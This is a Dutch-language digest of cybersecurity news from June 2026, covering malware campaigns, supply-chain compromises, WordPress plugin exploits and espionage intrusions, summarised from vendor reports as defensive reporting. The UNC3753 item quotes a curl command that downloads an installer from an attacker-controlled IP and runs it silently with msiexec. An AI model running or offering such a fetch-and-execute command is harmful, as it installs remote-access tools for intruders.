Men vermoedt dat de operatie is gericht op het verwerven en monetariseren van verkeer, waarbij geselecteerde gebruikers naar infrastructuur voor malware distributie worden geleid. Enkele van de geïdentificeerde websites imiteren betrouwbare reverse-engineering en security tools zoals Ghidra, dnSpy en SpiderFoot.

De aanvalsketens richten zich specifiek op gebruikers die via zoekmachines zoals Google naar dergelijke tools zoeken. Hierdoor verschijnen de nagemaakte websites bovenaan de zoekresultaten. Een eerdere versie van de campagne werd in november 2025 door Fullstory gedocumenteerd. Bewijs toont aan dat de activiteit al sinds september 2025 gaande is.

Het in Atlanta gevestigde bedrijf merkte destijds op dat "deze domeinen gericht zijn op het verkrijgen van gunstige zoekmachineposities door gebruik te maken van de naam, het merk en de populariteit van de originele websites en projecten." Veel websites staan bovenaan de zoekresultaten op Google voor de relevante zoekterm, vaak hoger dan de echte projectwebsite, wat hun zichtbaarheid maximaliseert en kan leiden tot meer links en inhoud.

Hoewel er aanvankelijk geen aanwijzingen waren voor kwaadaardige activiteiten anders dan het genereren van inhoud om verkeer aan te trekken en derden in staat te stellen hun eigen websites te adverteren, tonen de nieuwste bevindingen van Check Point aan dat de TDS scripts niet lang daarna werden ingesloten. De infrastructuur werd vanaf januari 2026 omgevormd voor de distributie van malware.

Een klik op de "Download" knop initieert een TDS omleidingsketen die resulteert in de implementatie van malware. Een opvallend aspect is dat bij het zweven over de knop de legitieme URL zichtbaar wordt van waar de tool kan worden gedownload, wat de website een schijn van legitimiteit geeft.

De omleidingsketens zijn ook zo ontworpen dat herhaalde pogingen om de site te bezoeken vanaf hetzelfde IP-adres resulteren in de download van goedaardige software, zoals de Opera browser of onnodige browser extensies. Enkele van de payloads die via dit TDS worden verspreid, zijn:

*   **SessionGate:** Een voorheen onbekende multi-stage, versluierde loader die wordt gebruikt om potentieel ongewenste applicaties (PUA) te leveren. Het bevat uitgebreide anti-analyse mechanismen om sandboxes te misleiden door over te schakelen naar een goedaardige installatie ervaring.

*   **Remus Stealer:** Een nieuwe informatie stealer, aangeboden onder een malware als een service (MaaS) model. Deze kan data stelen van meer dan 20 browsers, inclusief honderden browser extensies en applicaties, zoals cryptocurrency wallets, twee factor authenticatie tools en wachtwoordmanagers. Remus wordt beschouwd als een variant van de Lumma Stealer.

*   **AnimateClipper:** Een cryptocurrency clipper die gekopieerde wallet adressen in het klembord kan vervangen en transacties kan kapen over meer dan 20 blockchain ecosystemen. Het wordt geleverd via een ClickFix lokmiddel.

Een analyse van VirusTotal telemetrie heeft tot op heden ongeveer 2.000 tot 3.500 inzendingen van samples geassocieerd met de SessionGate familie onthuld. Het merendeel van deze inzendingen kwam uit Turkije, Polen, Brazilië, Duitsland, Frankrijk, Rusland en het Verenigd Koninkrijk.

Het uiteindelijke doel van de SessionGate infectieketen is het droppen van een payload die uniek is per client en pas wordt geleverd na het volledig doorlopen van het omleidingspad. De multi-stage leveringsketen, gecombineerd met uitgebreide validatie logica en TDS-gerelateerde gating, is ontworpen om analyse te weerstaan en het ophalen van de payload voor analisten een uitdagende taak te maken. De uiteindelijke DLL payload is verantwoordelijk voor communicatie met een externe server, het ophalen van een versleutelde configuratie van de server, het extraheren van de download URL uit de configuratie, en het downloaden en stil uitvoeren van de volgende fase malware via "cmd.exe."

Bukhteyev concludeert: "De toegangssites imiteren legitieme open source project portals, bewaren echte GitHub links om snelle visuele controles te doorstaan, en gebruiken vervolgens klik onderschepping om de eerste download klik om te leiden naar een afgeschermde TDS stack." Hij voegt eraan toe: "Het meest aannemelijke primaire doel is verkeersacquisitie en monetarisatie. Echter, door een afgeschermde TDS laag in te bedden en zoekverkeer ernaartoe te leiden, worden de operators onderdeel van een distributieketen waarvan de downstream consumenten malware distributeurs kunnen zijn. Dezelfde verkeerspijplijn die grijze monetarisatie aanstuurt, kan ook selectief echte gebruikers naar kwaadaardige payloads leiden."

 

Bron: Check Point

05 juni 2026 | Hackers bespioneren Outlook mailbox beursdirecteur maandenlang

Onbekende aanvallers hebben ten minste vijf maanden lang toegang gehad tot de Outlook mailbox van een hooggeplaatste directeur bij een grote wereldwijde beurs. Gedurende deze periode kopieerden de aanvallers de inhoud van de mailbox in kleine, herhaalde batches en leidden deze data via Dropbox en OneDrive om de activiteit te laten opgaan in normaal cloudverkeer.

Symantec en Carbon Black's Threat Hunter Team rapporteerden deze campagne deze week. De aard van de commando's duidt op spionage en verzameling van inlichtingen, in plaats van diefstal voor financieel gewin. De namen van de directeur en de beurs zijn niet bekendgemaakt. De waarde van dergelijke informatie is echter duidelijk: de inbox van een beursdirecteur kan niet-openbare noteringsdetails, handhavingskwesties, dealvoorwaarden, marktverplaatsende plannen, evenals de agenda en contacten van de directeur bevatten. Vijf maanden onopgemerkte toegang gaf de aanvaller een gedetailleerd inzicht in de activiteiten van de directeur en de toekomstige richting van de organisatie, zonder dat brede toegang tot andere bedrijfssystemen nodig was.

De eerste kwaadaardige activiteit werd waargenomen op 10 oktober 2025. Op dat moment voerde de aanvaller al twee binaire bestanden uit als SYSTEM, het hoogste Windows-privilegeniveau. Eén van deze bestanden deed zich voor als een Adobe updater en de andere als OneDrive. Tegen de tijd dat verdedigers iets opmerkten, had de indringer volledige controle over de machine, en de initiële toegangsmethode blijft onbekend. Symantec bevestigde echter dat de eerste tekenen waarschijnlijk afkomstig waren van laterale beweging vanaf een eerder gecompromitteerd apparaat.

De operatie kwam op 12 november in een hogere versnelling. De aanvaller verkreeg een Dropbox API token, begon data te uploaden met `curl`, en zette de hoofdgereedschap in: een mailbox stealer gebouwd op Aspose, een legitieme .NET bibliotheek die Outlook OST- en PST-bestanden leest. Dit gereedschap, verpakt in een uitvoerbaar bestand, converteerde de mailbox naar PST-formaat en schreef deze naar schijf, telkens uitgevoerd met een wachtwoord en een vlag voor het datumbereik. De eerste run omvatte alle data vanaf augustus 2025. Daarna keerde de aanvaller elke twee tot vier weken terug, waarbij elke run alleen de data sinds de vorige keer verzamelde. Dit gebeurde nog acht keer tot 17 februari 2026, wat resulteerde in een bijna continue kopie van de mailbox, opgesplitst in kleine genoeg delen om geen aandacht te trekken van beveiligingssoftware.

De stealth werd bereikt door de activiteiten er alledaags uit te laten zien. Geplande taken deden zich voor als systeem services van Adobe, Lenovo en OneDrive. Voor exfiltratie gebruikte de aanvaller Dropbox en OneDrive Personal. Voor OneDrive maakten ze verbinding met hardgecodeerde Microsoft IP-adressen in plaats van de onedrive.live.com hostname, zodat er geen DNS-zoekopdrachten waren die perimeter beveiligingssystemen konden detecteren of blokkeren. De aanvaller testte ook de publieke bestandshost temp.sh in november, maar liet deze daarna vallen. De laatst waargenomen activiteit, op 19 maart 2026, was een nieuwe backdoor die wel was klaargezet maar nooit werd uitgevoerd, wat volgens Elias van Symantec kan betekenen dat de aanvaller kort daarna de toegang verloor.

Symantec's gepubliceerde indicatoren wijzen op een bredere inbraakkit, niet alleen een mailbox grabber: FRPC voor het tunnelen van verkeer naar buiten, Secretsdump voor het ophalen van Windows credentials, SharpDecryptPwd voor het herstellen van opgeslagen app-wachtwoorden, en een tool om Windows User Account Control te omzeilen. Het rapport specificeert niet hoe elk van deze tools in dit specifieke geval werd gebruikt, en geen van hen wijst op een specifieke groep. Er is geen CVE in dit verhaal; het betrof een inbraak in een persoonlijke mailbox, niet de exploitatie van een recent onthulde kwetsbaarheid. Dit benadrukt waarom het incident belangrijk is: er is geen patch die dit dicht, en de verantwoordelijkheid verschuift naar monitoring en respons.

Attributie blijft onopgelost. De mix van publieke tools en consumenten cloud services liet weinig over om de activiteit te verbinden met een bekende actor, en dat blijft zo totdat een sterkere bron anders aangeeft. Exfiltratie via Dropbox en OneDrive om op te gaan in het normale verkeer is een bekende tactiek, en Microsoft heeft deze methode al eerder aangemerkt als een bewuste manier om perimeter verdedigingen te omzeilen en attributie te bemoeilijken. Organisaties die marktverplaatsende informatie beheren, doen er goed aan de hashes te controleren en te letten op ongebruikelijke mailbox exportactiviteit, vreemde Outlook-toegang, uploads naar persoonlijke Dropbox- of OneDrive-accounts, onverwachte tunneling, en het dumpen van credentials op systemen die gekoppeld zijn aan geprivilegieerde gebruikers.

 

Bron: Symantec en Carbon Black | Bron 2: security.com

05 juni 2026 | WordPress-sites aangevallen via lekken in Everest Forms Pro en Burst Statistics

Aanvallers maken momenteel actief misbruik van kwetsbaarheden in twee populaire WordPress-plug-ins: Everest Forms Pro en Burst Statistics. Deze beveiligingslekken stellen ongeauthenticeerde aanvallers in staat om administratoraccounts aan te maken, waardoor zij volledige controle over de getroffen websites kunnen verkrijgen.

Burst Statistics is een plug-in die door meer dan tweehonderdduizend websites wordt gebruikt om bezoekersinformatie te verzamelen. De ontwikkelaars omschrijven het als een privacyvriendelijk alternatief voor Google Analytics. Een kritieke kwetsbaarheid in de authenticatiefunctie van deze plug-in controleert onvoldoende of een opgegeven wachtwoord correct is. Dit betekent dat een aanvaller die de gebruikersnaam van een beheerder kent, in combinatie met een willekeurig wachtwoord, een nieuw admin account kan aanmaken. De ontwikkelaar heeft dit probleem op 12 mei verholpen met de release van versie 3.4.2. Echter, cybersecuritybedrijf Wordfence rapporteert dat aanvallers sinds 13 mei, de dag na de patch, actief misbruik maken van dit lek. De afgelopen weken zijn meer dan 110.000 aanvalspogingen waargenomen gericht op deze kwetsbaarheid.

De tweede plug-in, Everest Forms Pro, wordt gebruikt voor het ontwerpen van contactformulieren, nieuwsbrieven, quizzen en betaalformulieren. De kwetsbaarheid die actief wordt misbruikt, bevindt zich in de betaalde versie van de plug-in, die naar schatting op vierduizend websites actief is. Via dit lek kunnen ongeauthenticeerde aanvallers specifiek voorbereide waarden invoeren in een formulier van de WordPress-site. Dit maakt het mogelijk om PHP code uit te voeren op de onderliggende server. Ook bij aanvallen op Everest Forms Pro is het primaire doel van de aanvallers het creëren van een admin account. Wordfence heeft ongeveer dertigduizend aanvallen waargenomen die gericht waren op dit beveiligingslek. Websitebeheerders wordt geadviseerd om hun plug-ins zo snel mogelijk bij te werken naar de nieuwste versies om deze dreiging te mitigeren.

 

Bron: Wordfence

05 juni 2026 | Nep Claude Code-installatiepagina verspreidt fileless infostealer

Aanvallers maken gebruik van SEO-vergiftiging om valse installatiepagina’s van Anthropic’s Claude Code bovenaan in zoekresultaten te plaatsen, met als doel de verspreiding van malware. Deze gerichte aanpak viseert voornamelijk beginnende ontwikkelaars. De aanval maakt gebruik van de ClickFix social engineering techniek, waarbij het slachtoffer wordt misleid om een kwaadaardig MSHTA-commando uit te voeren via het Windows uitvoervenster.

De infectieketen begint met de inzet van een 6,7 MB groot polyglotbestand dat zowel MP3 als HTA is. Dit bestand is ontworpen om tijdens beveiligingsscans door te gaan voor afspeelbare audio, maar bevat een verborgen HTA-scriptblok. Na de uitvoering van het HTA-script volgen fileless PowerShell-stappen, waarna een reflectieve .NET infostealer wordt geladen. Deze infostealer draait volledig in het geheugen, zonder bestanden op schijf aan te maken.

De primaire functie van de infostealer is het stelen van inloggegevens die zijn opgeslagen in browser-opslag. Voor command and control (C2) communiceert de malware met Russische infrastructuur via diverse subdomeinen. Deze methode van aanval toont een toenemende verfijning in het omzeilen van traditionele beveiligingsmaatregelen door het ontbreken van persistente bestanden en het gebruik van legitiem ogende bestandsformaten.

 

Bron: Cybersecurity News

06 juni 2026 | Verdachte loginprompts op websites van Toshiba en Muji via gecompromitteerde polyfill[.]io

Techgigant Toshiba en retailer Muji hebben bezoekers gewaarschuwd voor verdachte aanmeldschermen die op hun websites verschenen en mogelijk inloggegevens konden verzamelen. Beide Japanse bedrijven adviseren gebruikers die hun accountgegevens hebben ingevoerd in deze authenticatieschermen, hun wachtwoorden onmiddellijk te wijzigen voor de betreffende dienst.

De loginprompts werden gegenereerd door de externe dienst gehost op polyfill[.]io. Dit domein introduceerde in 2024 al malafide code in scripts die via zijn Content Delivery Network (CDN) werden geleverd. Toshiba meldde in een korte communicatie: "We hebben bevestigd dat delen van onze website een aanmeldscherm kunnen weergeven zoals hieronder getoond. We werken momenteel aan het elimineren van dit scherm, maar als u het ziet, selecteer dan 'Annuleren' zonder enige informatie in te voeren."

De Japanse retailgigant Muji publiceerde eerder deze week een vergelijkbare waarschuwing. Muji stelt dat er op dit moment geen ongeautoriseerde toegang of informatielekkage is bevestigd, maar adviseert klanten desondanks voorzorgsmaatregelen te nemen. Zowel Toshiba als Muji hebben de problemen inmiddels opgelost en de dienst opgeschort.

Japanse media hebben eveneens gemeld dat Zojirushi, FiNC Technologies, Ishiyaku Publishers en het online uitgeversmerk Hobonichi door hetzelfde probleem werden getroffen. Beveiligingsonderzoeker Pasquale Pillitteri rapporteerde daarnaast dat ook Samsung Smart TV's en websites op 1 juni een loginprompt vertoonden.

De oorzaak van het probleem lijkt terug te voeren op een incident in 2024, toen het domein polyfill[.]io werd overgenomen door een Chinese entiteit. Deze entiteit voegde kwaadaardige scripts toe die destijds meer dan 100.000 websites troffen die de Polyfill-dienst gebruikten. Polyfill is een JavaScript CDN dat moderne websites compatibel maakt met oudere browsers door een compatibiliteitslaag te bieden voor niet-ondersteunde technologieën.

De oorspronkelijke code van Polyfill werd geleverd via een CDN op polyfill[.]io, maar het domein was niet in eigendom van de maker van het open source project, Andrew Betts. Toen het domein afliep, kon het door iedereen worden geclaimd. Betts reageerde destijds publiekelijk door website-eigenaren aan te raden de dienst van hun sites te verwijderen en lanceerde een nieuwe JavaScript CDN-dienst op polyfill.com, later gevestigd op polyfill.top.

Hoewel de deactivering van de dienst op polyfill[.]io de omleidingen stopte, zijn sommige sites die de dienst gebruikten er de afgelopen twee jaar niet in geslaagd om al hun pagina's op te schonen, waardoor restanten van de Polyfill-code achterbleven. Pillitteri meldt dat het polyfill[.]io-domein eind mei 2026 opnieuw actief werd en begon te reageren met HTTP 401 authenticatieverzoeken. Browsers van gebruikers die pagina's bezoeken, zoals die van Toshiba en Muji, interpreteren dit als een verzoek om een gebruikersnaam en wachtwoord, waarna een loginprompt wordt weergegeven.

Op dit moment is er geen indicatie dat de getroffen websites zijn gehackt of dat referenties die op deze malafide aanmeldschermen zijn ingevoerd, daadwerkelijk zijn gestolen. Gebruikers wordt echter ten zeerste aanbevolen voorzichtig te zijn met onverwachte authenticatieprompts en bij twijfel geen gegevens in te voeren.

 

Bron: Toshiba en Muji | Bron 2: global.toshiba | Bron 3: itmedia.co.jp

06 juni 2026 | Chinese APT UNC5221 zet nieuwe malware in voor langdurige toegang

Een Chinese spionagegroep, bekend als UNC5221 en ook getraceerd als VerdantBamboo, heeft nieuwe malware ingezet om langdurige toegang te behouden tot gecompromitteerde netwerken. De groep maakt misbruik van de Brickstorm backdoor en twee recent ontdekte malwarevarianten genaamd Plenet en AgentPSD om toegang te krijgen tot Microsoft 365 omgevingen.

Onderzoek naar een incident, uitgevoerd door Volexity, onthulde dat de dreigingsactor minstens achttien maanden vóór detectie al toegang had tot het netwerk van het slachtoffer. Bovendien bleek de managed services provider (MSP) van de getroffen organisatie eveneens te zijn gecompromitteerd. UNC5221 staat erom bekend sinds 2023 zero day kwetsbaarheden in edge apparaten te misbruiken.

De Brickstorm backdoor, door onderzoekers omschreven als een "geavanceerde malware implant", werd meer dan een jaar onopgemerkt gebruikt in de omgevingen van verschillende doelen in de Verenigde Staten, totdat de inbreuken rond maart 2025 werden ontdekt. De initiële versies van Brickstorm waren geschreven in Golang, waarna nieuwere varianten in Rust verschenen. Google documenteerde de activiteit van UNC5221 met deze backdoor in april 2024 en opnieuw in september 2025, waarbij aanvallen op juridische dienstverleners, software as a service providers, business process outsourcers en technologiebedrijven werden beschreven. CISA waarschuwde eerder al voor de inzet van Brickstorm door Chinese hackers tegen VMware vSphere servers, en Google rapporteerde recentelijk dat UNC6201 de malware gebruikte tegen Dell RecoverPoint for Virtual Machines.

Volexity ontdekte vorig jaar dat VerdantBamboo een Egnyte Storage Sync systeem had gecompromitteerd en hier periodiek toegang toe verkreeg via de web SSL VPN van het slachtoffer. Vanuit deze positie en met behulp van Brickstorm proxy functionaliteiten en gestolen inloggegevens, kreeg de dreigingsactor toegang tot de Microsoft 365 omgeving van de organisatie. De onderzoekers van Volexity achten het zeer waarschijnlijk dat dit gebeurde om op te gaan in legitiem netwerkverkeer en zo Conditional Access beleid te omzeilen dat anders toegang zou hebben voorkomen.

Later bleek dat de hackers minstens achttien maanden op het netwerk aanwezig waren geweest voordat ze werden gedetecteerd. Bovendien wist VerdantBamboo de organisatie opnieuw te compromitteren nadat de onderzoekers de herstelwerkzaamheden hadden voltooid. Tijdens deze tweede inbraak gebruikten de aanvallers gestolen inloggegevens om SSL VPN toegang op de firewall van het slachtoffer in te schakelen en te configureren. Vervolgens maakten ze verbinding met interne systemen en implementeerden ze aanvullende op maat gemaakte malware op een Synology NAS apparaat. Dit leidde tot een onderzoek bij de MSP van de klant, waar Volexity ontdekte dat VerdantBamboo een BSD variant van Brickstorm op een pfSense firewall had geplaatst. Deze firewall was, net als het Storage Sync systeem van de getroffen organisatie, minstens achttien maanden eerder gecompromitteerd. Volexity heeft een gemiddeld vertrouwen dat de aanvaller vanuit de MSP naar de omgeving van de slachtofferorganisatie is doorgedrongen. Brickstorm werd vervolgens ingezet op de Egnyte Storage Sync appliance van het slachtoffer en op een buiten gebruik gestelde Linux GroupWise e mailarchiefserver.

Enkele dagen later keerden de aanvallers terug en herstelden ze de toegang tot de infrastructuur van het slachtoffer. Ze implementeerden toen de op maat gemaakte malware Plenet op een Synology NAS appliance. Plenet, door Google ook getraceerd als "Grimbolt", is een cross platform .NET gebaseerde backdoor die interactieve shell toegang, uitvoering van commando's op afstand, bestandsmanipulatie en het wisselen van command and control (C2) servers mogelijk maakt. De onderzoekers merken op dat Plenet qua ontwerp lijkt op Brickstorm, met gebruik van het WebSocket protocol voor C2 communicatie en een multiplexing bibliotheek voor gelijktijdige datastromen naar de server.

AgentPSD is een eenvoudig Python gebaseerde reverse shell utility. Volexity vermoedt dat VerdantBamboo deze gebruikte als een terugval mechanisme voor persistentie, mocht andere malware niet langer toegankelijk zijn. De onderzoekers ontdekten dat AgentPSD was geconfigureerd om verbinding te maken met een ander domein dan datgene dat Brickstorm gebruikte. De malware werd echter nooit ingezet, aangezien Brickstorm nog steeds actief was, wat de inschatting ondersteunt dat AgentPSD een secundair toegangsmechanisme was.

Tijdens het onderzoek probeerde Volexity de infrastructuur van VerdantBamboo te achterhalen. De onderzoekers ontwikkelden een fingerprint om IP adressen en domeinen te identificeren die Brickstorm gebruikte voor C2 communicatie. Hoewel meerdere machines werden geïdentificeerd, haalde de dreigingsactor de infrastructuur offline voordat de onderzoekers andere systemen konden onthullen. Tussen 18 en 23 september schakelden alle servers die eerder aan het patroon voldeden hun diensten op poort 443 uit. Rond diezelfde tijd publiceerde Google ook een nieuw rapport over de activiteit van Brickstorm, wat mogelijk suggereert dat de aanvaller op de hoogte was van het onderzoek naar hun operaties. Volexity omschrijft VerdantBamboo/UNC5221 als een "zeer geavanceerde dreigingsactor" die living off the land technieken en malware combineert en systemen aanvalt die niet direct... (tekst ingekort)

 

Bron: Volexity | Bron 2: learn.microsoft.com | Bron 3: github.com

06 juni 2026 | Miasma malware treft 32 Red Hat packages via gecompromitteerd account op GitHub

Op 1 juni 2026 hebben experts van meerdere cybersecuritybedrijven een omvangrijke supply chain compromittering ontdekt die softwarecomponenten van Red Hat treft. Beveiligingsfirma's Microsoft, Wiz Research, Snyk en Aikido rapporteerden dat aanvallers schadelijke code hebben geïnjecteerd in softwarepakketten onder de naam @redhat-cloud-services op npm, een openbare bibliotheek waar ontwikkelaars bouwstenen voor hun code vandaan halen.

De kwestie had gevolgen voor ten minste 32 pakketten, wat leidde tot 96 gecompromitteerde versies. Deze pakketten zijn essentieel voor het functioneren van de Red Hat Hybrid Cloud Console en worden wekelijks tussen de 80.000 en 117.000 keer gedownload. Gezien de brede integratie van deze modules, reikt de impact verder dan de infrastructuur van Red Hat zelf, tot externe ontwikkelpijplijnen.

De aanvallers maakten geen gebruik van wachtwoordraden of typosquatting. In plaats daarvan kregen zij toegang tot het persoonlijke GitHub-account van een legitieme Red Hat-medewerker. Via dit account hebben zij verborgen code wijzigingen (kwaadaardige "orphan commits") rechtstreeks in twee RedHatInsights repositories gepusht, zonder dat deze code werd beoordeeld.

Deze wijzigingen vonden plaats in twee golven van activiteit en introduceerden een minimaal GitHub Actions workflow. Dit workflow vroeg kortstondige OIDC identity tokens aan bij GitHub. Het systeem gebruikte deze tokens vervolgens om direct te authenticeren met npm's trusted publishing endpoint en de besmette pakketten te uploaden. Omdat de code afkomstig leek van een legitieme Red Hat-configuratie, werden de gecompromitteerde versies geleverd met geldige SLSA provenance attestations, waardoor ze authentiek leken voor beveiligingsscanners.

Onderzoekers hebben deze specifieke malwarevariant Miasma genoemd. Het opereert als een zelf-propagerende worm en credential stealer, gebaseerd op Mini Shai-Hulud. Dit is een open source malware framework dat eerder in 2026 werd gepubliceerd op BreachForums door de dreigingsgroep TeamPCP. De nieuwe versie van de malware vervangt oude ruimtevaartthema's door termen uit de Griekse mythologie, zoals Spartan.

Wanneer een ontwikkelaar een van deze besmette pakketten installeert, wordt automatisch een verborgen preinstall script geactiveerd voordat normale code wordt uitgevoerd. Dit script zoekt onmiddellijk naar gevoelige gegevens op de computer. Dit omvat cloud login keys voor Google Cloud, Microsoft Azure en Amazon Web Services, evenals SSH keys, wachtwoordgegevens en keys voor AI tools zoals Claude en Gemini. Daarnaast bevraagt de worm de npm registry voor andere pakketten die de geïnfecteerde identiteit mag wijzigen. Vervolgens publiceert het automatisch die pakketten opnieuw met dezelfde kwaadaardige payload, waardoor een enkele gecompromitteerde werkstation kan uitgroeien tot een vector om meer registries te infecteren.

De beheerders van de registry hebben de meeste kwaadaardige versies binnen enkele uren na de openbaarmaking ingetrokken, maar het onderzoek naar de supply chain voortgezet. Beveiligingsteams wordt geadviseerd om hun lockfiles te controleren, install scripts te blokkeren met de 'ignore-scripts' configuratie, en onmiddellijk alle cloud credentials of tokens te roteren die toegankelijk waren vanuit getroffen build environments.

 

Bron: Snyk | Bron 2: aikido.dev

06 juni 2026 | Nieuwe Android spyware 'Asin' richt zich op Arabischtalige gebruikers via valse apps

Onderzoekers van het Slowaakse cybersecuritybedrijf ESET hebben een nieuwe Android spyware ontdekt, genaamd Asin, die zich richt op Arabischtalige gebruikers. De malware wordt verspreid via diverse campagnes die sinds begin 2025 zijn waargenomen. Elke aanvalsgolf maakt gebruik van specifieke websites die legitieme apps, oorlogsgerelateerde updates en overheidsnieuwsbronnen nabootsen.

De websites die ESET heeft geïdentificeerd, zijn govlens[.]net, dat een overheidsnieuwsbron imiteert en op 27 mei 2025 is geregistreerd; pdf-reader[.]help, dat zich voordoet als een veilige PDF-editor en op 29 mei 2025 is geregistreerd; en live-war-map[.]com, dat updates over militaire incidenten belooft en op 20 januari 2025 is geregistreerd. Twee van deze websites, govlens[.]net en live-war-map[.]com, werden ook gepromoot via speciale accounts op sociale mediaplatforms zoals Facebook en Telegram, waaronder de Facebook-pagina www.facebook[.]com/GovLens.

Volgens ESET distribueert elk van deze websites een kwaadaardige app die legitieme functionaliteit combineert met heimelijke spywaremogelijkheden. Het cybersecuritybedrijf merkt op dat de naam van het Telegram-kanaal waarschijnlijk is geïnspireerd op Live Universal Awareness Map (Liveuamap), een legitiem en bekend platform dat zich richt op het in kaart brengen van lopende conflicten, mensenrechtenkwesties, natuurrampen en geopolitieke gebeurtenissen wereldwijd.

Meerdere artefacten die verband houden met Asin zijn inmiddels geïdentificeerd. Een daarvan werd in oktober 2025 vanuit Turkije geüpload naar VirusTotal. Een andere APK werd in december 2025 gedownload van het domein c-pdf[.]net door een gebruiker op een Xiaomi Redmi Note 13 Pro-apparaat met Android 15. Een derde sample, dat zich voordeed als "Syria Defense Map", werd rond half januari 2026 gedetecteerd op een Xiaomi Redmi Note 13 Pro+ 5G-apparaat met Android 15. In dit laatste geval werd de APK gedownload van de website syriadefensemap[.]com. Gebruikers moeten de app handmatig installeren en de benodigde machtigingen verlenen voordat de spyware zijn doelen kan realiseren.

De activiteit van de groep achter Asin is volgens ESET nog niet toegeschreven aan een specifieke actor en de primaire doelen van deze campagnes zijn onbekend. Echter, op basis van de gebruikte lokmiddelen wordt vermoed dat journalisten en OSINT (Open Source Intelligence)-onderzoekers in Arabischtalige regio's het doelwit kunnen zijn geweest. Drie van de vijf frauduleuze apps die ESET heeft ontdekt - GovLens, WarMap en Syria Defense Map - lijken voornamelijk bedoeld voor mensen die geïnteresseerd zijn in openbronnenonderzoek. Dit suggereert dat de activiteiten, in ieder geval gedeeltelijk, gericht waren op Arabischtalige journalisten of OSINT-professionals.

 

Bron: ESET | Bron 2: welivesecurity.com

06 juni 2026 | Mandiant waarschuwt voor geavanceerde datadiefstal en afpersing door UNC3753, inclusief fysieke infiltratie

De Google Threat Intelligence Group Mandiant heeft een financieel gemotiveerde campagne voor datadiefstal en afpersing blootgelegd, uitgevoerd door de dreigingscluster UNC3753, ook bekend onder de namen "Luna Moth", "Chatty Spider" en "Silent Ransom Group". Tussen januari en mei 2026 werden tientallen organisaties in de professionele, juridische en financiële dienstverlening in de Verenigde Staten het doelwit. Deze aanvallers maken gebruik van geavanceerde voice phishing (vishing) en sociale engineering technieken om toegang te verkrijgen tot bedrijfsomgevingen.

De campagne begint vaak met goedaardige, factuur gerelateerde e-mails die geen kwaadaardige links of bijlagen bevatten. Het primaire doel van deze e-mails is het creëren van een voorwendsel en het wekken van interne beveiligingsbezwaren bij het doelwit, waardoor zij ontvankelijker worden voor daaropvolgende telefoongesprekken.

UNC3753 voert vervolgens gerichte vishing aanvallen uit. De actoren doen zich voor als IT ondersteuning of leden van het interne beveiligingsteam en benaderen medewerkers van alle niveaus, vaak personen wier contactgegevens openbaar op de website van de organisatie staan vermeld. Onder het mom van het oplossen van een beveiligingsprobleem of het ondersteunen van een datamigratieproject, bouwen de aanvallers vertrouwen op en overtuigen zij het slachtoffer om deel te nemen aan een schermdeel sessie en Remote Monitoring and Management (RMM) tools te downloaden.

Eenmaal binnen de omgeving zoeken de dreigingsactoren direct naar en exfiltreren zij gevoelige gegevens, of manipuleren zij het slachtoffer om deze acties namens hen uit te voeren. De gestolen data omvat doorgaans bedrijfseigen juridische overeenkomsten, persoonlijk identificeerbare informatie (PII) en financiële gegevens, die vervolgens worden gebruikt voor afpersingsdoeleinden.

Een bijzonder zorgwekkend aspect van deze campagne is dat in sommige gevallen, mogelijk gelinkt aan UNC3753, de dreigingsactoren fysiek toegang hebben verkregen tot systemen van slachtoffers. Personen die zich voordeden als IT technici betraden bedrijfskantoren om direct data van endpoints te exfiltreren met behulp van USB opslagmedia.

Het operationele model van UNC3753 kenmerkt zich door een hoge snelheid. In veel onderzochte incidenten vond de gehele aanvalssequentie - van initieel contact tot datadiefstal en afpersing - plaats binnen één werkdag. Mandiant heeft recentelijk waargenomen dat het zoeken naar data, het klaarzetten en de diefstal al in minder dan een uur werden geïnitieerd.

Voor schermdeel sessies maken de aanvallers gebruik van legitieme diensten zoals Zoom, Microsoft Terminal Services, Microsoft Teams en Quick Assist. Voor meer persistente toegang proberen zij slachtoffers te overtuigen om RMM agents zoals AnyDesk, Bomgar of Zoho Assist te installeren. In één geval werd geprobeerd een "SuperOps RMM agent" te installeren via een cURL commando, zoals: `curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet`. De communicatie van installatielinks en commando's gebeurt consistent via privnote[.]com, een web gebaseerde, zelfvernietigende tekst utility, om sporen op endpoints te vermijden.

 

Bron: Mandiant | Bron 2: virustotal.com

06 juni 2026 | Wachtwoordkluis klanten Dashlane gestolen na bruteforce aanval

Wachtwoordmanager Dashlane heeft meer details vrijgegeven over een recente bruteforce aanval waarbij de wachtwoordkluis van een klein aantal klanten werd gestolen. De aanvallers richtten zich op de API endpoints die Dashlane gebruikt voor de registratie van nieuwe apparaten.

Gebruikers van Dashlane kunnen extra apparaten, zoals telefoons of computers, aan hun account toevoegen. Voor de verificatie van de identiteit van de accounthouder stuurt Dashlane een zescijferig token naar het e-mailadres van de gebruiker. Indien tweefactorauthenticatie (2FA) is ingeschakeld, moet de gebruiker een code genereren via een authenticatie app. De ontvangen of gegenereerde code wordt vervolgens in de Dashlane app ingevoerd. Na succesvolle verificatie registreert Dashlane het nieuwe apparaat en downloadt een kopie van de online wachtwoordkluis naar het zojuist toegevoegde apparaat.

Bij de bruteforce aanval verstuurden de aanvallers een groot aantal geautomatiseerde requests naar de API endpoints voor apparaatregistratie. Voordat de aanval volledig kon worden gestopt, slaagden de aanvallers erin om geldige tokens te bruteforcen en te genereren voor minder dan twintig gebruikers. Dit stelde de aanvallers in staat om een nieuw apparaat aan het account van deze gebruikers toe te voegen, waarna de versleutelde wachtwoordkluis op het apparaat van de aanvaller werd gedownload.

Dashlane benadrukt dat de gestolen wachtwoordkluizen versleuteld zijn. Om toegang te krijgen tot de inhoud, moeten de aanvallers het master password van de betreffende accounts kraken. De wachtwoordmanager heeft aangekondigd extra verificatiemaatregelen te zullen invoeren voor het toevoegen van nieuwe apparaten om dergelijke aanvallen in de toekomst te voorkomen.

 

Bron: Dashlane

06 juni 2026 | Nieuwe dreigingsgroep OP-512 richt zich op Microsoft IIS servers

Cybersecurityonderzoekers hebben een voorheen onbekende dreigingsgroep genaamd OP-512 (waarbij "OP" staat voor "opponent") ontdekt, die zich richt op Microsoft Internet Information Services (IIS) servers om een op maat gemaakt web shell framework te implementeren. ReliaQuest schat met matig tot hoog vertrouwen in dat deze spionagegerichte activiteit gerelateerd is aan China.

